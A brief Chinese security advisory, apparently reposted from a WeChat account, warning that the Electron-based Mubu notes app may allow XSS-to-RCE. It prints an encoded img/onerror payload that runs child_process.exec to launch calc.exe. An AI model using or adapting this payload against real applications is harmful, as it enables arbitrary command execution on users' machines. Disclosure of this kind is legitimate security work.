Electron 是一个开源的跨平台框架,用于构建基于Web技术(HTML、CSS和JavaScript)的桌面应用程序。它由 GitHub 公司开发并维护,目前具有 108k star
由于 Electron 内置了 Chromium 内核,并且拥有直接执行Nodejs代码的能力,攻击者可借助 XSS 漏洞在服务器端远程执行任意代码
当应用程序使用 Electron 框架时,通过接收攻击者精心构造的 Payload 后可能会产生命令执行漏洞
漏洞payload
<img src=x onerror='eval(new Buffer(`cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ2NhbGMuZXhlJywoZXJyb3IsIHN0ZG91dCwgc3RkZXJyKT0+ewphbGVydChgc3Rkb3V0OiAke3N0ZG91dH1gKTsgCn0pOw==`,`base64`).toString())'>
原文始发于微信公众号(刨洞之眼):【紧急预警】幕布笔记疑似存在RCE
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论